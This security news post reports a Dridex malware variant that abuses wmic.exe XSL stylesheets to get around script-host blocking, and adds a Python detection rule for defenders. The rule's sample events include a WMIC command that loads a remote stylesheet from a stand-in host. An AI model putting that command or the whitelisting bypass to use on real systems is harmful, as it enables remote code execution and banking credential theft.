SCMag reported that a new strain of the notorious Dridex malware has been spotted using polymorphic antivirus-evasion techniques in phishing emails. The Dridex credential-stealer, which almost exclusively targets financial institutions, continues to evolve and now uses application-whitelisting bypass techniques to infect systems and evade most antivirus products.
According to security researchers, the new variant, discovered in mid-June, uses application-whitelisting bypass techniques that sidestep a common mitigation, disabling or blocking Windows Script Host. Instead of running its script through wscript.exe or cscript.exe, the loader abuses the WMI command-line (WMIC) utility's weak execution policy around XSL stylesheets (XSL, not Excel .xls files): wmic.exe will load a stylesheet it is told to use, local or remote, and execute script embedded in it. Because the executing binary is the signed, Microsoft-shipped wmic.exe, neither disabling Windows Script Host nor a whitelist that trusts Windows binaries stops it. The Dridex developers are highly sophisticated and take advantage of exactly this gap.
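Telemetry for this technique is easier to reason about with a concrete triage rule. The following is an added example, not code from the article or from the researchers it cites: it scores process-creation events (Sysmon Event ID 1 style fields, constructed here rather than captured from the campaign) for wmic.exe invocations whose `/format:` argument names a stylesheet other than the ones Windows ships, and raises the score when the parent is an Office application, which is the macro-to-WMIC chain the text describes. The format keyword list, the sample events and the severity labels are assumptions for the example.

```python
import re

# Added example (not from the article or the researchers it cites): triage logic
# for WMIC stylesheet abuse. All events below are constructed, not real telemetry.

# Parents that indicate a document macro spawned WMIC (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Format keywords WMIC resolves to its own stylesheets under %SystemRoot%\System32\wbem.
BUILTIN_FORMATS = {"csv", "hform", "htable", "list", "mof", "rawxml",
                   "table", "textvaluelist", "value", "xml"}

# Captures the value of /format: whether double-quoted, single-quoted or bare.
FORMAT_RE = re.compile(r'/format:\s*(?:"([^"]*)"|\'([^\']*)\'|(\S+))', re.IGNORECASE)

# Constructed sample events: one Office-spawned remote stylesheet, two benign
# administrative uses, one local attacker-dropped stylesheet from a shell.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'wmic os get /format:"https://example.invalid/a7f3.xsl"'},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"wmic process list brief"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"wmic computersystem get /format:list"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'wmic /format:"C:\Users\Public\r.xsl" os get'},
]


def format_argument(cmdline: str):
    """Return the /format: value from a WMIC command line, or None if absent."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    return next(g for g in m.groups() if g is not None)


def is_external_stylesheet(arg: str) -> bool:
    """True when the argument names a stylesheet WMIC did not ship with.

    Anything with a path separator (local path, UNC share, URL) is external;
    otherwise the bare keyword, with an optional .xsl suffix and optional
    ':parameters' tail, must be one of the built-in format names.
    """
    name = arg.strip().lower()
    if "\\" in name or "/" in name:
        return True
    base = name.split(":", 1)[0]
    if base.endswith(".xsl"):
        base = base[:-4]
    return base not in BUILTIN_FORMATS


def classify(event: dict) -> str:
    """Severity for one process-creation event: 'high', 'medium' or 'none'."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image != "wmic.exe":
        return "none"
    arg = format_argument(event["cmdline"])
    if arg is None or not is_external_stylesheet(arg):
        return "none"
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    # Office parent plus a non-shipped stylesheet is the macro-to-WMIC chain.
    return "high" if parent in OFFICE_PARENTS else "medium"


def triage(events) -> list:
    """Return (severity, command line) for every event that scored above 'none'."""
    hits = []
    for e in events:
        sev = classify(e)
        if sev != "none":
            hits.append((sev, e["cmdline"]))
    return hits


if __name__ == "__main__":
    for sev, cmd in triage(SAMPLE_EVENTS):
        print(f"{sev:6} {cmd}")
```

The rule keys on the stylesheet argument rather than on wmic.exe itself, because administrators do run WMIC; the two benign events score "none" while the Office-spawned remote stylesheet scores "high" and the cmd.exe-spawned local one "medium". The corresponding preventive control is to treat wmic.exe like the script hosts the variant avoids: deny it to ordinary users in the whitelisting policy, since a rule set that blocks wscript.exe and cscript.exe but trusts every Microsoft-signed binary is exactly the gap the article describes.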
Dridex has undergone numerous transformations as it has evolved over the last decade, first appearing as Cridex in 2011. The malware targets banking information on the victim system. It has since added other features, such as a transition to XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption.
Researchers also observed that the campaign behind this Dridex variant is still evolving: "Given the same-day deployment and implementation of the ssl-pert[.]com domain on June 26th and a tendency to utilise randomly generated variables and URL directories, it is probable the actors behind this variant of Dridex will continue to change up indicators throughout the current campaign."
The malware was observed arriving through email in the form of a malicious document with embedded macros, according to researchers. Depending on the environment, the macros can be triggered by varying levels of employee interaction. They added that given that email is the initial access point, employees are the last line of defense against this threat.
Javvad Malik, security awareness advocate at KnowBe4, told SC Media UK that while the malware initially was only detected by a handful of companies, the number of antivirus products that can detect it will increase in the coming days.
"Because the initial infection comes as a result of an email which requires a user to interact with the attachment, the best form of defense is to provide appropriate user security awareness training to users so that they can best identify and report such emails and, as a result, prevent the infection from occurring altogether," he said.
Jake Moore, cyber-security specialist at ESET, told SC Media UK that it feels as though, for as long as phishing emails have been around, Dridex has not been far behind. SCMag has the full story.